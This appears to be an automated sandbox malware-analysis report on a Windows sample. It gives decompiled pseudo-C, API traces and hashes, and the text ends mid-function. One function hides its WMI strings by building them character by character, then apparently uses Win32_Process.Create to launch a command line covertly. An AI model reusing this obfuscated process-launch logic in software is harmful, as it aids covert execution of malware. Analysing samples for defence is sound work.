0x00403e11
0x00403e16
0x00403e28
0x00403e2a
0x00403e3b
0x00403e3d
0x00403e3e
0x00403e2c
0x00403e32
0x00000000
0x00403e32
0x00403e2a
0x00403e0f

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,004026EC,00000001), ref: 00403DF3

Part of subcall function 00403C9A: GetVersionExA.KERNEL32 ref: 00403CB9

HeapDestroy.KERNEL32 ref: 00403E32

Part of subcall function 004040AC: HeapAlloc.KERNEL32(00000000,00000140,00403E1B,000003F8), ref: 004040B9

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocCreateDestroyVersion
String ID:
API String ID: 2507506473-0
Opcode ID: 459ff63f0a519e06ba7e0233f00400d57d4cc8d3df7f9ce67a017d6a64b97de1
Instruction ID: 1735e363aa649432a40250d06eb6c58b98efe11c80a4699b8f613c158a3918bd
Opcode Fuzzy Hash: 459ff63f0a519e06ba7e0233f00400d57d4cc8d3df7f9ce67a017d6a64b97de1
Instruction Fuzzy Hash: 32F0E571904302A9EB201F71DE0933A3DD897D4347F10083BF904F41E0EB788688915E

Uniqueness

Uniqueness Score: -1.00%

Function 004028EE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004028EE(unsigned int _a4) {
				signed int _v8;
				intOrPtr _v20;
				void* _v32;
				intOrPtr _t19;
				void* _t20;
				signed char _t22;
				void* _t23;
				void* _t24;
				void* _t36;
				unsigned int _t44;
				unsigned int _t46;
				intOrPtr _t47;
				void* _t50;

				_push(0xffffffff);
				_push(0x408178);
				_push(E00403E48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t47;
				_t19 =  *0x40d528; // 0x1
				if(_t19 != 3) {
					__eflags = _t19 - 2;
					if(_t19 != 2) {
						goto L11;
					} else {
						_t24 = _a4;
						__eflags = _t24;
						if(_t24 == 0) {
							_t44 = 0x10;
						} else {
							_t9 = _t24 + 0xf; // 0xf
							_t44 = _t9 & 0xfffffff0;
						}
						_a4 = _t44;
						__eflags = _t44 -  *0x40c26c; // 0x1e0
						if(__eflags > 0) {
							L10:
							_push(_t44);
							goto L14;
						} else {
							E004052E9(9);
							_pop(_t36);
							_v8 = 1;
							_v32 = E00404EEB(_t36, _t44 >> 4);
							_v8 = _v8 | 0xffffffff;
							E004029B4();
							_t23 = _v32;
							__eflags = _t23;
							if(_t23 == 0) {
								goto L10;
							}
						}
					}
				} else {
					_t46 = _a4;
					_t50 = _t46 -  *0x40d520; // 0x0
					if(_t50 > 0) {
						L11:
						_t20 = _a4;
						__eflags = _t20;
						if(_t20 == 0) {
							_t20 = 1;
						}
						_t22 = _t20 + 0x0000000f & 0x000000f0;
						__eflags = _t22;
						_push(_t22);
						L14:
						_push(0);
						_t23 = RtlAllocateHeap( *0x40d524); // executed
					} else {
						E004052E9(9);
						_v8 = _v8 & 0x00000000;
						_push(_t46);
						_v32 = E00404448();
						_v8 = _v8 | 0xffffffff;
						E00402955();
						_t23 = _v32;
						if(_t23 == 0) {
							goto L11;
						} else {
						}
					}
				}
				 *[fs:0x0] = _v20;
				return _t23;
			}

0x004028f1
0x004028f3
0x004028f8
0x00402903
0x00402904
0x00402911
0x00402919
0x0040295e
0x00402961
0x00000000
0x00402963
0x00402963
0x00402966
0x00402968
0x00402974
0x0040296a
0x0040296a
0x0040296d
0x0040296d
0x00402975
0x00402978
0x0040297e
0x004029ae
0x004029ae
0x00000000
0x00402980
0x00402982
0x00402987
0x00402988
0x0040299b
0x0040299e
0x004029a2
0x004029a7
0x004029aa
0x004029ac
0x00000000
0x00000000
0x004029ac
0x0040297e
0x0040291b
0x0040291b
0x0040291e
0x00402924
0x004029bd
0x004029bd
0x004029c0
0x004029c2
0x004029c6
0x004029c6
0x004029ca
0x004029ca
0x004029cc
0x004029cd
0x004029cd
0x004029d5
0x0040292a
0x0040292c
0x00402932
0x00402936
0x0040293d
0x00402940
0x00402944
0x00402949
0x0040294e
0x00000000
0x00000000
0x00402950
0x0040294e
0x00402924
0x004029de
0x004029e9

APIs

RtlAllocateHeap.NTDLL(00000000,-0000000F,00000000,?,00000000,00000000,00000000), ref: 004029D5

Part of subcall function 004052E9: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,004058AB,00000009,00000000,00000000,00000001,004032E8,00000001,00000074,?,?,00000000,00000001), ref: 00405326
Part of subcall function 004052E9: EnterCriticalSection.KERNEL32(?,?,?,004058AB,00000009,00000000,00000000,00000001,004032E8,00000001,00000074,?,?,00000000,00000001), ref: 00405341

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$AllocateEnterHeapInitialize
String ID:
API String ID: 1616793339-0
Opcode ID: 7bbd5473fd6bc51d3e61c3eac8cc2a89cd68cc97dd0fd1485c25fdd4c9c0a3f3
Instruction ID: f50376a6a7cf927dab1dbef67e099464c920ff73bf2ce2a5ffda6ec42ea7effe
Opcode Fuzzy Hash: 7bbd5473fd6bc51d3e61c3eac8cc2a89cd68cc97dd0fd1485c25fdd4c9c0a3f3
Instruction Fuzzy Hash: A421A9B2B00205ABDB10EF65DE46B9E7764EB05724F10453BF850FB2C0D7BC99418AAC

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401050, Relevance: 82.7, APIs: 22, Strings: 25, Instructions: 457
memorystringcomCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E00401050() {
				char _v40;
				intOrPtr _v48;
				signed int _v60;
				char _v96;
				char _v136;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				char _v176;
				WCHAR* _v184;
				char _v196;
				char _v200;
				intOrPtr _v212;
				char _v220;
				intOrPtr _v228;
				char _v240;
				char _v248;
				intOrPtr _v252;
				intOrPtr* _v256;
				void* _v260;
				char _v264;
				intOrPtr _v272;
				char _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				char _v292;
				intOrPtr _v296;
				intOrPtr* _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				intOrPtr _v332;
				intOrPtr* _v336;
				char _v340;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr* _v388;
				char _v396;
				char _v404;
				signed int _v408;
				signed int _v412;
				char _v420;
				intOrPtr* _v424;
				intOrPtr* _v432;
				char _v440;
				void* _v444;
				intOrPtr* _v452;
				intOrPtr* _v460;
				intOrPtr* _v464;
				intOrPtr* _v468;
				intOrPtr* _v472;
				intOrPtr* _v480;
				intOrPtr* _v492;
				intOrPtr* _v496;
				intOrPtr _t172;
				char* _t174;
				intOrPtr* _t175;
				intOrPtr _t177;
				intOrPtr* _t178;
				intOrPtr _t179;
				void* _t180;
				intOrPtr* _t182;
				intOrPtr* _t186;
				intOrPtr* _t188;
				intOrPtr* _t190;
				intOrPtr* _t195;
				intOrPtr* _t197;
				intOrPtr* _t199;
				intOrPtr* _t204;
				intOrPtr* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				intOrPtr* _t208;
				intOrPtr _t215;
				intOrPtr* _t216;
				intOrPtr* _t220;
				intOrPtr* _t226;
				intOrPtr* _t227;
				intOrPtr* _t228;
				intOrPtr* _t229;
				intOrPtr* _t238;
				intOrPtr* _t244;
				intOrPtr* _t245;
				intOrPtr* _t246;
				intOrPtr* _t247;
				intOrPtr* _t248;
				void* _t263;
				intOrPtr* _t268;
				signed int _t320;
				signed int _t321;
				intOrPtr _t323;
				void* _t324;
				intOrPtr* _t328;
				WCHAR* _t329;
				intOrPtr* _t331;
				intOrPtr* _t332;
				intOrPtr* _t333;
				intOrPtr* _t334;
				intOrPtr* _t335;
				intOrPtr* _t336;
				void* _t337;
				intOrPtr _t339;
				intOrPtr _t340;
				void* _t341;

				_t172 =  *[fs:0x0];
				 *[fs:0x0] = _t340;
				_t341 = _t340 - 0xc4;
				_t321 = _t320 | 0xffffffff;
				_v176 = 0;
				__imp__CoInitializeSecurity(0, _t321, 0, 0, 0, 3, 0, 0, 0, _t320, _t324, _t337, _t263, _t172, E00407B65, 0xffffffff);
				if(_t172 < 0) {
					L68:
					 *[fs:0x0] = _v48;
					return _v212;
				}
				_v240 = 0;
				_t174 =  &_v240;
				_v40 = 0;
				__imp__CoCreateInstance(0x408850, 0, 1, 0x40a044, _t174);
				if(_t174 < 0) {
					L42:
					_v60 = _t321;
					goto L66;
				} else {
					_v264 = 0;
					_v60 = 1;
					_v176 = 0x4f0052;
					_v172 = 0x54004f;
					_v168 = 0x43005c;
					_v164 = 0x4d0049;
					_v160 = 0x320056;
					_v156 = 0;
					_t177 = E0040226B(0xc);
					_t341 = _t341 + 4;
					_v228 = _t177;
					_v60 = 2;
					if(_t177 == 0) {
						_t178 = 0;
					} else {
						_t178 = E00401810(_t177, _t177,  &_v176);
					}
					_v60 = 1;
					_v256 = _t178;
					if(_t178 == 0) {
						E00407643(0x8007000e);
						_t178 = _v260;
					}
					_v60 = 3;
					if(_t178 == 0) {
						_t179 = 0;
					} else {
						_t179 =  *_t178;
					}
					_t268 = _v260;
					_t180 =  *((intOrPtr*)( *_t268 + 0xc))(_t268, _t179, 0, 0, 0, 0, 0, 0,  &_v264);
					E004017C0( &_v292);
					_t182 = _v300;
					if(_t180 < 0) {
						L40:
						_v96 = 0;
						if(_t182 != 0) {
							 *((intOrPtr*)( *_t182 + 8))(_t182);
						}
						goto L42;
					} else {
						__imp__CoSetProxyBlanket(_t182, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t182 < 0) {
							_t182 = _v332;
							goto L40;
						}
						_v304 = 0;
						_v308 = 0;
						_v316 = 0;
						_t328 = __imp__#2;
						_v260 = 0x720043;
						_v256 = 0x610065;
						_v252 = 0x650074;
						_v248 = 0;
						_v172 = 0x690057;
						_v168 = 0x33006e;
						_v164 = 0x5f0032;
						_v160 = 0x720050;
						_v156 = 0x63006f;
						_v152 = 0x730065;
						_v148 = 0x73;
						_t323 =  *_t328( &_v260);
						_v300 = _t323;
						_t339 =  *_t328( &_v176);
						_v152 = _t339;
						_t186 = _v340;
						_v136 = 8;
						 *((intOrPtr*)( *_t186 + 0x18))(_t186, _t339, 0, 0,  &_v312, 0);
						_t188 = _v336;
						 *((intOrPtr*)( *_t188 + 0x4c))(_t188, _t323, 0,  &_v340, 0);
						_t190 = _v360;
						 *((intOrPtr*)( *_t190 + 0x3c))(_t190, 0,  &_v368);
						_v388 =  *_t328(_v184);
						_t329 = _v184;
						_v196 = 9;
						if(_t329 != 0) {
							_push(lstrlenW(0x40a040));
							E004016C0(0x40a040);
							_push(lstrlenW(_t329));
							_t193 = E004016C0(_t329);
						}
						_v360 = 0;
						E00401770(_t193,  &_v360, _v388);
						_t195 = _v388;
						_v292 = 0x6f0043;
						_v288 = 0x6d006d;
						_v284 = 0x6e0061;
						_v280 = 0x4c0064;
						_v276 = 0x6e0069;
						_v272 = 0x65;
						_v200 = 0xa;
						 *((intOrPtr*)( *_t195 + 0x14))(_t195,  &_v292, 0,  &_v364, 0);
						_v404 = 0;
						_t197 = _v424;
						_push(0);
						_push( &_v404);
						_push(_v408);
						_push(0);
						_push(0);
						_push(_t323);
						_push(_t339);
						_push(_t197);
						_v220 = 0xb;
						if( *((intOrPtr*)( *_t197 + 0x60))() < 0) {
							_t199 = _v432;
							_v248 = 0xa;
							if(_t199 != 0) {
								 *((intOrPtr*)( *_t199 + 8))(_t199);
							}
							__imp__#9( &_v412);
							_t331 = __imp__#6;
							 *_t331(_v444);
							 *_t331(_t339);
							 *_t331(_t323);
							_t204 = _v452;
							_v264 = 5;
							if(_t204 != 0) {
								 *((intOrPtr*)( *_t204 + 8))(_t204);
							}
							_t205 = _v444;
							_v264 = 4;
							if(_t205 != 0) {
								 *((intOrPtr*)( *_t205 + 8))(_t205);
							}
							_t206 = _v440;
							_v264 = 1;
							if(_t206 != 0) {
								 *((intOrPtr*)( *_t206 + 8))(_t206);
							}
							_t207 = _v468;
							_v264 = 0;
							if(_t207 != 0) {
								 *((intOrPtr*)( *_t207 + 8))(_t207);
							}
							_t208 = _v464;
							_v264 = 0xffffffff;
							if(_t208 != 0) {
								 *((intOrPtr*)( *_t208 + 8))(_t208);
							}
							goto L68;
						}
						_v396 = 0;
						_v248 = 0xc;
						_v316 = 0x650052;
						_v312 = 0x750074;
						_v308 = 0x6e0072;
						_v304 = 0x610056;
						_v300 = 0x75006c;
						_v296 = 0x65;
						_t215 = E0040226B(0xc);
						_t341 = _t341 + 4;
						_v444 = _t215;
						_v248 = 0xd;
						if(_t215 == 0) {
							_t332 = 0;
						} else {
							_t332 = E00401810(_t215, _t215,  &_v316);
						}
						_v248 = 0xc;
						_v260 = _t332;
						if(_t332 == 0) {
							E00407643(0x8007000e);
						}
						_v248 = 0xe;
						if(_t332 == 0) {
							_v444 = 0;
						} else {
							_v444 =  *_t332;
						}
						_t216 = _v432;
						_v468 =  *((intOrPtr*)( *_t216 + 0x10))(_t216, _v444, 0,  &_v396, 0, 0);
						if(_t332 != 0) {
							E00401850(_t332);
						}
						if(_v468 < 0 || (_v412 | _v408) != 0) {
							_t333 = __imp__#9;
							 *_t333( &_v420);
							_t220 = _v460;
							_v276 = 0xa;
							if(_t220 != 0) {
								 *((intOrPtr*)( *_t220 + 8))(_t220);
							}
							 *_t333( &_v440);
							_t334 = __imp__#6;
							 *_t334(_v472);
							 *_t334(_t339);
							 *_t334(_t323);
							_t226 = _v480;
							_v292 = 5;
							if(_t226 != 0) {
								 *((intOrPtr*)( *_t226 + 8))(_t226);
							}
							_t227 = _v472;
							_v292 = 4;
							if(_t227 != 0) {
								 *((intOrPtr*)( *_t227 + 8))(_t227);
							}
							_t228 = _v468;
							_v292 = 1;
							if(_t228 != 0) {
								 *((intOrPtr*)( *_t228 + 8))(_t228);
							}
							_t229 = _v496;
							_v292 = 0;
							if(_t229 != 0) {
								 *((intOrPtr*)( *_t229 + 8))(_t229);
							}
							_v292 = 0xffffffff;
							L66:
							_t175 = _v260;
							if(_t175 != 0) {
								 *((intOrPtr*)( *_t175 + 8))(_t175);
							}
						} else {
							_t335 = __imp__#9;
							_v444 = 1;
							 *_t335( &_v420);
							_t238 = _v460;
							_v276 = 0xa;
							if(_t238 != 0) {
								 *((intOrPtr*)( *_t238 + 8))(_t238);
							}
							 *_t335( &_v440);
							_t336 = __imp__#6;
							 *_t336(_v472);
							 *_t336(_t339);
							 *_t336(_t323);
							_t244 = _v480;
							_v292 = 5;
							if(_t244 != 0) {
								 *((intOrPtr*)( *_t244 + 8))(_t244);
							}
							_t245 = _v472;
							_v292 = 4;
							if(_t245 != 0) {
								 *((intOrPtr*)( *_t245 + 8))(_t245);
							}
							_t246 = _v468;
							_v292 = 1;
							if(_t246 != 0) {
								 *((intOrPtr*)( *_t246 + 8))(_t246);
							}
							_t247 = _v496;
							_v292 = 0;
							if(_t247 != 0) {
								 *((intOrPtr*)( *_t247 + 8))(_t247);
							}
							_t248 = _v492;
							_v292 = 0xffffffff;
							if(_t248 != 0) {
								 *((intOrPtr*)( *_t248 + 8))(_t248);
							}
						}
						goto L68;
					}
				}
			}

0x00401057
0x0040105e
0x00401065
0x00401078
0x0040107e
0x00401082
0x0040108a
0x00401687
0x00401696
0x004016a3
0x004016a3
0x00401090
0x00401094
0x00401098
0x004010ad
0x004010b5
0x00401521
0x00401521
0x00000000
0x004010bb
0x004010bb
0x004010c1
0x004010c9
0x004010d1
0x004010d9
0x004010e1
0x004010e9
0x004010f1
0x004010f8
0x004010fd
0x00401100
0x00401106
0x0040110e
0x0040111e
0x00401110
0x00401117
0x00401117
0x00401122
0x0040112a
0x0040112e
0x00401135
0x0040113a
0x0040113a
0x00401140
0x00401148
0x0040114e
0x0040114a
0x0040114a
0x0040114a
0x00401150
0x00401163
0x0040116c
0x00401171
0x00401177
0x00401510
0x00401512
0x00401519
0x0040151e
0x0040151e
0x00000000
0x0040117d
0x00401188
0x00401190
0x0040150c
0x00000000
0x0040150c
0x00401196
0x0040119a
0x0040119e
0x004011a2
0x004011ad
0x004011b5
0x004011bd
0x004011c5
0x004011c9
0x004011d4
0x004011df
0x004011ea
0x004011f5
0x00401200
0x0040120b
0x00401218
0x0040121a
0x00401228
0x0040122a
0x00401231
0x00401241
0x00401249
0x0040124c
0x0040125b
0x0040125e
0x0040126b
0x00401278
0x0040127c
0x00401283
0x0040128d
0x0040129a
0x004012a4
0x004012b0
0x004012b6
0x004012b6
0x004012bf
0x004012c9
0x004012ce
0x004012e4
0x004012ef
0x004012fa
0x00401305
0x00401310
0x0040131b
0x00401327
0x0040132f
0x00401332
0x00401336
0x0040133e
0x0040133f
0x00401346
0x00401347
0x00401348
0x00401349
0x0040134a
0x0040134b
0x0040134c
0x00401359
0x0040152d
0x00401531
0x0040153b
0x00401540
0x00401540
0x00401548
0x00401552
0x00401559
0x0040155c
0x0040155f
0x00401561
0x00401565
0x0040156f
0x00401574
0x00401574
0x00401577
0x0040157b
0x00401585
0x0040158a
0x0040158a
0x0040158d
0x00401591
0x0040159b
0x004015a0
0x004015a0
0x004015a3
0x004015a7
0x004015b0
0x004015b5
0x004015b5
0x004015b8
0x004015bc
0x004015c9
0x004015d2
0x004015d2
0x00000000
0x004015c9
0x0040135f
0x00401366
0x0040136e
0x00401379
0x00401384
0x0040138f
0x0040139a
0x004013a5
0x004013ac
0x004013b1
0x004013b4
0x004013ba
0x004013c2
0x004013d7
0x004013c4
0x004013d3
0x004013d3
0x004013db
0x004013e3
0x004013ea
0x004013f1
0x004013f1
0x004013f8
0x00401400
0x0040140a
0x00401402
0x00401404
0x00401404
0x0040140e
0x00401427
0x0040142b
0x0040142f
0x0040142f
0x00401438
0x004015da
0x004015e5
0x004015e7
0x004015eb
0x004015f5
0x004015fa
0x004015fa
0x00401602
0x00401608
0x0040160f
0x00401612
0x00401615
0x00401617
0x0040161b
0x00401625
0x0040162a
0x0040162a
0x0040162d
0x00401631
0x0040163b
0x00401640
0x00401640
0x00401643
0x00401647
0x00401651
0x00401656
0x00401656
0x00401659
0x0040165d
0x00401666
0x0040166b
0x0040166b
0x0040166e
0x00401679
0x00401679
0x0040167f
0x00401684
0x00401684
0x0040144e
0x0040144e
0x00401459
0x00401461
0x00401463
0x00401467
0x00401471
0x00401476
0x00401476
0x0040147e
0x00401484
0x0040148b
0x0040148e
0x00401491
0x00401493
0x00401497
0x004014a1
0x004014a6
0x004014a6
0x004014a9
0x004014ad
0x004014b7
0x004014bc
0x004014bc
0x004014bf
0x004014c3
0x004014cd
0x004014d2
0x004014d2
0x004014d5
0x004014d9
0x004014e2
0x004014e7
0x004014e7
0x004014ea
0x004014ee
0x004014fb
0x00401504
0x00401504
0x004014fb
0x00000000
0x00401438
0x00401177

APIs

CoInitializeSecurity.OLE32(00000000,00610064,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00610064,74B482B0,002F0074,00000000), ref: 00401082
CoCreateInstance.OLE32(00408850,00000000,00000001,0040A044,?), ref: 004010AD
CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00401188
SysAllocString.OLEAUT32(?), ref: 00401216
SysAllocString.OLEAUT32(?), ref: 00401226
lstrlenW.KERNEL32(0040A040), ref: 00401294

Part of subcall function 004016C0: SysAllocStringLen.OLEAUT32(00000000,?), ref: 004016E7

lstrlenW.KERNEL32(?,0040A040,00000000), ref: 004012AA

Part of subcall function 004016C0: SysStringLen.OLEAUT32(00000000), ref: 004016D2
Part of subcall function 004016C0: SysFreeString.OLEAUT32(?), ref: 00401741

SysAllocString.OLEAUT32(?), ref: 00401276

Part of subcall function 00401810: SysAllocString.OLEAUT32(?), ref: 00401827

VariantClear.OLEAUT32(?), ref: 00401461
VariantClear.OLEAUT32(?), ref: 0040147E
SysFreeString.OLEAUT32(?), ref: 0040148B
SysFreeString.OLEAUT32(00000000), ref: 0040148E
SysFreeString.OLEAUT32(00000000), ref: 00401491
VariantClear.OLEAUT32(?), ref: 00401548
SysFreeString.OLEAUT32(?), ref: 00401559
SysFreeString.OLEAUT32(00000000), ref: 0040155C
SysFreeString.OLEAUT32(00000000), ref: 0040155F
VariantClear.OLEAUT32(?), ref: 004015E5
VariantClear.OLEAUT32(?), ref: 00401602
SysFreeString.OLEAUT32(?), ref: 0040160F
SysFreeString.OLEAUT32(00000000), ref: 00401612
SysFreeString.OLEAUT32(00000000), ref: 00401615

Strings

t, xrefs: 00401379
l, xrefs: 0040139A
R, xrefs: 0040136E
I, xrefs: 004010E1
V, xrefs: 004010E9
2, xrefs: 004011DF
n, xrefs: 004011D4
R, xrefs: 004010C9
C, xrefs: 004012E4
e, xrefs: 00401200
d, xrefs: 00401305
e, xrefs: 004011B5
O, xrefs: 004010D1
a, xrefs: 004012FA
C, xrefs: 004011AD
s, xrefs: 0040120B
V, xrefs: 0040138F
m, xrefs: 004012EF
i, xrefs: 00401310
P, xrefs: 004011EA
\, xrefs: 004010D9
o, xrefs: 004011F5
W, xrefs: 004011C9
r, xrefs: 00401384
t, xrefs: 004011BD

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$AllocClearVariant$lstrlen$BlanketCreateInitializeInstanceProxySecurity
String ID: 2$C$C$I$O$P$R$R$V$V$W$\$a$d$e$e$i$l$m$n$o$r$s$t$t
API String ID: 1217749482-3083329441
Opcode ID: 009e9cf9b6574323736ed6c517d116fd5ffe3bd227aade0435da75f0cec640d5
Instruction ID: 5316d4cd7e012ab08a76c93adacbcdbad040e195fafe7267618739ec9e19a769
Opcode Fuzzy Hash: 009e9cf9b6574323736ed6c517d116fd5ffe3bd227aade0435da75f0cec640d5
Instruction Fuzzy Hash: CF023D70508381DFD720CF65C888B5BBBE8BF89308F14496EF589AB291C7799845CF66

Uniqueness

Uniqueness Score: -1.00%

Function 004048FD, Relevance: .3, Instructions: 259
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E004048FD(signed int* _a4, intOrPtr* _a8, char _a11, signed int _a12, char _a15) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				intOrPtr _t186;
				void* _t187;
				signed int _t188;
				signed int* _t189;
				intOrPtr _t191;
				signed int* _t192;
				signed int* _t193;
				signed char _t194;
				intOrPtr _t195;
				intOrPtr* _t196;
				signed int _t199;
				signed int _t202;
				signed int _t207;
				signed int _t209;
				signed int _t218;
				signed int _t221;
				signed int* _t222;
				signed int _t227;
				intOrPtr _t228;
				intOrPtr _t229;
				intOrPtr _t230;
				char _t233;
				signed int _t234;
				signed char _t235;
				signed int* _t237;
				signed int* _t239;
				signed int* _t244;
				signed int* _t245;
				signed char _t250;
				intOrPtr _t256;
				signed int _t257;
				char _t258;
				char _t259;
				signed char _t260;
				signed int* _t262;
				signed int* _t267;
				signed int* _t268;
				char* _t270;
				signed int _t274;
				unsigned int _t275;
				intOrPtr _t277;
				unsigned int _t278;
				intOrPtr* _t280;
				void* _t281;
				signed char _t290;
				signed int _t292;
				signed char _t295;
				signed int _t298;
				signed int _t302;
				signed int* _t304;

				_t222 = _a4;
				_t280 = _a8;
				_t186 =  *((intOrPtr*)(_t222 + 0x10));
				_t292 = _a12 + 0x00000017 & 0xfffffff0;
				_t274 = _t280 -  *((intOrPtr*)(_t222 + 0xc)) >> 0xf;
				_v16 = _t274 * 0x204 + _t186 + 0x144;
				_t227 =  *((intOrPtr*)(_t280 - 4)) - 1;
				_a12 = _t227;
				_t194 =  *(_t227 + _t280 - 4);
				_t281 = _t227 + _t280 - 4;
				_v8 = _t194;
				if(_t292 <= _t227) {
					if(__eflags < 0) {
						_t195 = _a8;
						_a12 = _a12 - _t292;
						_t228 = _t292 + 1;
						 *((intOrPtr*)(_t195 - 4)) = _t228;
						_t196 = _t195 + _t292 - 4;
						_a8 = _t196;
						_t295 = (_a12 >> 4) - 1;
						 *((intOrPtr*)(_t196 - 4)) = _t228;
						__eflags = _t295 - 0x3f;
						if(_t295 > 0x3f) {
							_t295 = 0x3f;
						}
						__eflags = _v8 & 0x00000001;
						if((_v8 & 0x00000001) == 0) {
							_t298 = (_v8 >> 4) - 1;
							__eflags = _t298 - 0x3f;
							if(_t298 > 0x3f) {
								_t298 = 0x3f;
							}
							__eflags =  *((intOrPtr*)(_t281 + 4)) -  *((intOrPtr*)(_t281 + 8));
							if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
								__eflags = _t298 - 0x20;
								if(_t298 >= 0x20) {
									_t128 = _t298 - 0x20; // -32
									_t130 = _t186 + 4; // 0x4
									_t244 = _t298 + _t130;
									_t199 =  !(0x80000000 >> _t128);
									 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
									 *_t244 =  *_t244 - 1;
									__eflags =  *_t244;
									if( *_t244 == 0) {
										_t245 = _a4;
										_t138 = _t245 + 4;
										 *_t138 =  *(_t245 + 4) & _t199;
										__eflags =  *_t138;
									}
								} else {
									_t304 = _t298 + _t186 + 4;
									_t202 =  !(0x80000000 >> _t298);
									 *(_t186 + 0x44 + _t274 * 4) =  *(_t186 + 0x44 + _t274 * 4) & 0x80000000;
									 *_t304 =  *_t304 - 1;
									__eflags =  *_t304;
									if( *_t304 == 0) {
										 *_a4 =  *_a4 & _t202;
									}
								}
								_t196 = _a8;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 8)) + 4)) =  *((intOrPtr*)(_t281 + 4));
							 *((intOrPtr*)( *((intOrPtr*)(_t281 + 4)) + 8)) =  *((intOrPtr*)(_t281 + 8));
							_t302 = _a12 + _v8;
							_a12 = _t302;
							_t295 = (_t302 >> 4) - 1;
							__eflags = _t295 - 0x3f;
							if(_t295 > 0x3f) {
								_t295 = 0x3f;
							}
						}
						_t229 = _v16;
						_t230 = _t229 + _t295 * 8;
						 *((intOrPtr*)(_t196 + 4)) =  *((intOrPtr*)(_t229 + 4 + _t295 * 8));
						 *((intOrPtr*)(_t196 + 8)) = _t230;
						 *((intOrPtr*)(_t230 + 4)) = _t196;
						 *((intOrPtr*)( *((intOrPtr*)(_t196 + 4)) + 8)) = _t196;
						__eflags =  *((intOrPtr*)(_t196 + 4)) -  *((intOrPtr*)(_t196 + 8));
						if( *((intOrPtr*)(_t196 + 4)) ==  *((intOrPtr*)(_t196 + 8))) {
							_t233 =  *(_t295 + _t186 + 4);
							__eflags = _t295 - 0x20;
							_a11 = _t233;
							_t234 = _t233 + 1;
							__eflags = _t234;
							 *(_t295 + _t186 + 4) = _t234;
							if(_t234 >= 0) {
								__eflags = _a11;
								if(_a11 == 0) {
									_t237 = _a4;
									_t176 = _t237 + 4;
									 *_t176 =  *(_t237 + 4) | 0x80000000 >> _t295 - 0x00000020;
									__eflags =  *_t176;
								}
								_t189 = _t186 + 0xc4 + _t274 * 4;
								_t235 = _t295 - 0x20;
								_t275 = 0x80000000;
							} else {
								__eflags = _a11;
								if(_a11 == 0) {
									_t239 = _a4;
									 *_t239 =  *_t239 | 0x80000000 >> _t295;
									__eflags =  *_t239;
								}
								_t189 = _t186 + 0x44 + _t274 * 4;
								_t275 = 0x80000000;
								_t235 = _t295;
							}
							 *_t189 =  *_t189 | _t275 >> _t235;
							__eflags =  *_t189;
						}
						_t188 = _a12;
						 *_t196 = _t188;
						 *((intOrPtr*)(_t188 + _t196 - 4)) = _t188;
					}
					L52:
					_t187 = 1;
					return _t187;
				}
				if((_t194 & 0x00000001) != 0 || _t292 > _t194 + _t227) {
					return 0;
				} else {
					_t250 = (_v8 >> 4) - 1;
					_v12 = _t250;
					if(_t250 > 0x3f) {
						_t250 = 0x3f;
						_v12 = _t250;
					}
					if( *((intOrPtr*)(_t281 + 4)) ==  *((intOrPtr*)(_t281 + 8))) {
						if(_t250 >= 0x20) {
							_t267 = _v12 + _t186 + 4;
							_t218 =  !(0x80000000 >> _t250 + 0xffffffe0);
							 *(_t186 + 0xc4 + _t274 * 4) =  *(_t186 + 0xc4 + _t274 * 4) & 0x80000000;
							 *_t267 =  *_t267 - 1;
							__eflags =  *_t267;
							if( *_t267 == 0) {
								_t268 = _a4;
								_t44 = _t268 + 4;
								 *_t44 =  *(_t268 + 4) & _t218;
								__eflags =  *_t44;
							}
						} else {
							_t270 = _v12 + _t186 + 4;
							_t221 =  !(0x80000000 >> _t250);
